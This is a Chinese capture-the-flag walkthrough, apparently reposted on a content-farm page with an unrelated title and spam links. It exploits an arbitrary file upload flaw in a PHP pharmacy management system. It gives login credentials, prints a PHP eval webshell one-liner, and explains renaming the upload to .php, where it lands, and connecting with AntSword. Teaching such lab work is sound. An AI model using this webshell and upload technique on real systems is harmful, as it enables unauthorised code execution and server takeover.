当前位置: 首页 > news >正文

外贸网站建设加推广中文com域名注册

外贸网站建设加推广,中文com域名注册,网店html模板,国办网站建设规范目录 靶标介绍 开启靶场 上传一句话木马 蚁剑连接 找到 flag 靶标介绍 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库&#xff0…

目录

靶标介绍

开启靶场

上传一句话木马

蚁剑连接

找到 flag


靶标介绍

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

开启靶场

根据社会工程学方法可得

邮箱:mayuri.infospace@gmail.com
密码:mayurik

登录成功

在这个页面发现了可以上传文件的地方

上传一句话木马

上传一句话木马 1.jpg,内容为:

<?php @eval($_POST[cmd]);?>

抓包,发送到 repeater,修改后缀为 php,发送请求,发现上传成功了,看来文件上传点就在这里

检查页面,搜索 1.php,发现了上传路径是“assets/myimages/1.php”

蚁剑连接

使用 base64 编码

连接成功,在根目录下找到了 flag 文件夹

找到 flag

http://www.yayakq.cn/news/394293/

相关文章:

  • 大型网站开发企业wordpress關閉評論
  • 天津网站推广宣传网站建设需要岗位
  • 温州开发网站公司网站怎样做百度推广计划
  • 苏州做网站的公司哪家好四川省住房与建设厅网站首页
  • 做图网站有哪些东西网站前端建设需要学会什么
  • 上海网站建设免网站如何做长尾词排名
  • 农家乐网站 建设yy大杂烩
  • 找事做的网站网站建设的技术支持论文
  • ppt要怎么做网站一个考试网站怎么做
  • 网站 建设运行情况报告网站设计公司推荐奇点网络
  • 茶楼网站源码企业网站建设与推广多少钱
  • 可信网站认证必需做吧网站部署环境
  • 网站开发制作计算器百度提交网站的入口地址
  • 惠州建设企业网站电商网站设计
  • 图书馆网站建设策划设计师网络接单
  • 阿里云怎么上传网站外包平台都有哪些
  • 中企动力网站案例天津平台网站建设设计
  • 网站建设新发展辽宁城乡建设部网站
  • 潍坊网站制作保定公司电话无货源电商选品软件
  • 中国古风网站模板兰州网站设计有限公司
  • django 做网站南京seo公司哪家好
  • 做平面的就一定要做网站吗网站设计的公司报价
  • 电影网站权重怎么做百度seo发帖推广
  • 百度网站模板免费下载福建城乡建设部网站首页
  • 焦作网站建设公司哪家好各自的特点是什么
  • 网站开发国内外研究背景如何做网站泛目录解析
  • 网站营销推广策划书建立网站的风险
  • 承接各类网站建设wordpress修改首页文章样式
  • 蓝色管理系统网站模版昆明做网站的公司有哪些
  • 美食网站开发现状espcms易思企业网站管理系统